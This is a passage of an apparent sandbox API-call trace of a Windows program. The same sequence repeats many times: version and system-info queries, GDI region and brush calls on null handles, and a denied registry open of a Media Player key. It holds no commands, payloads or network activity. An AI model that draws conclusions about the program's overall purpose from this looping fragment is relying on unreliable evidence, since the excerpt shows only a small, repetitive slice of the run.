dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.486] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.486] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.486] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.486] BeginPath (hdc=0x0) returned 0 [0092.486] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.486] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.486] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.486] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.486] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.486] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.486] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe0401d9 [0092.486] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc0401dc [0092.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047910 [0092.486] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047911 [0092.486] CombineRgn (hrgnDst=0x1047910, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=1) returned 1 [0092.486] CombineRgn (hrgnDst=0x1047911, hrgnSrc1=0xe0401d9, hrgnSrc2=0xc0401dc, iMode=4) returned 2 [0092.486] CreateSolidBrush (color=0xff) returned 0x210790f [0092.486] CreateSolidBrush (color=0xff0000) returned 0x1107912 [0092.486] DeleteObject (ho=0x1107912) returned 1 [0092.486] DeleteObject (ho=0xc0401dc) returned 1 [0092.486] DeleteObject (ho=0xe0401d9) returned 1 [0092.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.487] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.487] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.487] BeginPath (hdc=0x0) returned 0 [0092.487] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.487] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.487] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.487] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.487] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.487] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.487] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0401dc [0092.487] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf0401d9 [0092.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047913 [0092.487] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047914 [0092.487] CombineRgn (hrgnDst=0x1047913, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=1) returned 1 [0092.487] CombineRgn (hrgnDst=0x1047914, hrgnSrc1=0xd0401dc, hrgnSrc2=0xf0401d9, iMode=4) returned 2 [0092.487] CreateSolidBrush (color=0xff) returned 0x2107912 [0092.487] CreateSolidBrush (color=0xff0000) returned 0x1107915 [0092.487] DeleteObject (ho=0x1107915) returned 1 [0092.487] DeleteObject (ho=0xf0401d9) returned 1 [0092.487] DeleteObject (ho=0xd0401dc) returned 1 [0092.487] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.487] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.487] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.488] BeginPath (hdc=0x0) returned 0 [0092.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.488] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.488] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.488] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.488] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x100401d9 [0092.488] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe0401dc [0092.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047916 [0092.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047917 [0092.488] CombineRgn (hrgnDst=0x1047916, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=1) returned 1 [0092.488] CombineRgn (hrgnDst=0x1047917, hrgnSrc1=0x100401d9, hrgnSrc2=0xe0401dc, iMode=4) returned 2 [0092.488] CreateSolidBrush (color=0xff) returned 0x2107915 [0092.488] CreateSolidBrush (color=0xff0000) returned 0x1107918 [0092.488] DeleteObject (ho=0x1107918) returned 1 [0092.488] DeleteObject (ho=0xe0401dc) returned 1 [0092.488] DeleteObject (ho=0x100401d9) returned 1 [0092.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.488] BeginPath (hdc=0x0) returned 0 [0092.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.488] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.488] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.488] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.489] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401dc [0092.489] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401d9 [0092.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047919 [0092.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104791a [0092.489] CombineRgn (hrgnDst=0x1047919, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=1) returned 1 [0092.489] CombineRgn (hrgnDst=0x104791a, hrgnSrc1=0xf0401dc, hrgnSrc2=0x110401d9, iMode=4) returned 2 [0092.489] CreateSolidBrush (color=0xff) returned 0x2107918 [0092.489] CreateSolidBrush (color=0xff0000) returned 0x110791b [0092.489] DeleteObject (ho=0x110791b) returned 1 [0092.489] DeleteObject (ho=0x110401d9) returned 1 [0092.489] DeleteObject (ho=0xf0401dc) returned 1 [0092.489] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.489] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.489] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.489] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.489] BeginPath (hdc=0x0) returned 0 [0092.489] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.489] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.489] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401d9 [0092.489] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401dc [0092.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104791c [0092.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104791d [0092.489] CombineRgn (hrgnDst=0x104791c, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=1) returned 1 [0092.489] CombineRgn (hrgnDst=0x104791d, hrgnSrc1=0x120401d9, hrgnSrc2=0x100401dc, iMode=4) returned 2 [0092.489] CreateSolidBrush (color=0xff) returned 0x210791b [0092.489] CreateSolidBrush (color=0xff0000) returned 0x110791e [0092.489] DeleteObject (ho=0x110791e) returned 1 [0092.489] DeleteObject (ho=0x100401dc) returned 1 [0092.489] DeleteObject (ho=0x120401d9) returned 1 [0092.489] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.489] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.490] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.490] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.490] BeginPath (hdc=0x0) returned 0 [0092.490] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.490] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.490] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.490] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401dc [0092.490] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401d9 [0092.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104791f [0092.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047920 [0092.490] CombineRgn (hrgnDst=0x104791f, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=1) returned 1 [0092.490] CombineRgn (hrgnDst=0x1047920, hrgnSrc1=0x110401dc, hrgnSrc2=0x130401d9, iMode=4) returned 2 [0092.490] CreateSolidBrush (color=0xff) returned 0x210791e [0092.490] CreateSolidBrush (color=0xff0000) returned 0x1107921 [0092.490] DeleteObject (ho=0x1107921) returned 1 [0092.490] DeleteObject (ho=0x130401d9) returned 1 [0092.490] DeleteObject (ho=0x110401dc) returned 1 [0092.490] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.490] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.490] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.490] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.490] BeginPath (hdc=0x0) returned 0 [0092.490] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.490] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.490] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401d9 [0092.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401dc [0092.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047922 [0092.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047923 [0092.491] CombineRgn (hrgnDst=0x1047922, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=1) returned 1 [0092.491] CombineRgn (hrgnDst=0x1047923, hrgnSrc1=0x140401d9, hrgnSrc2=0x120401dc, iMode=4) returned 2 [0092.491] CreateSolidBrush (color=0xff) returned 0x2107921 [0092.491] CreateSolidBrush (color=0xff0000) returned 0x1107924 [0092.491] DeleteObject (ho=0x1107924) returned 1 [0092.491] DeleteObject (ho=0x120401dc) returned 1 [0092.491] DeleteObject (ho=0x140401d9) returned 1 [0092.491] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.491] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.491] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.491] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.491] BeginPath (hdc=0x0) returned 0 [0092.491] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.491] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.491] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.491] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401dc [0092.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401d9 [0092.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047925 [0092.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047926 [0092.491] CombineRgn (hrgnDst=0x1047925, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=1) returned 1 [0092.492] CombineRgn (hrgnDst=0x1047926, hrgnSrc1=0x130401dc, hrgnSrc2=0x150401d9, iMode=4) returned 2 [0092.492] CreateSolidBrush (color=0xff) returned 0x2107924 [0092.492] CreateSolidBrush (color=0xff0000) returned 0x1107927 [0092.492] DeleteObject (ho=0x1107927) returned 1 [0092.492] DeleteObject (ho=0x150401d9) returned 1 [0092.492] DeleteObject (ho=0x130401dc) returned 1 [0092.492] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.492] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.492] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.492] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.492] BeginPath (hdc=0x0) returned 0 [0092.492] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.492] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.492] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0092.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0092.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0092.492] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0092.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0092.509] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401d9 [0092.509] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401dc [0092.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047928 [0092.510] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1047929 [0092.510] CombineRgn (hrgnDst=0x1047928, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=1) returned 1 [0092.510] CombineRgn (hrgnDst=0x1047929, hrgnSrc1=0x160401d9, hrgnSrc2=0x140401dc, iMode=4) returned 2 [0092.510] CreateSolidBrush (color=0xff) returned 0x2107927 [0092.510] CreateSolidBrush (color=0xff0000) returned 0x110792a [0092.510] DeleteObject (ho=0x110792a) returned 1 [0092.510] DeleteObject (ho=0x140401dc) returned 1 [0092.510] DeleteObject (ho=0x160401d9) returned 1 [0092.510] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0092.510] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0092.510] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.510] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0092.510] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0092.510] BeginPath (hdc=0x0) returned 0 [0092.510] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0092.510] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0092.510] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0092.510] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) 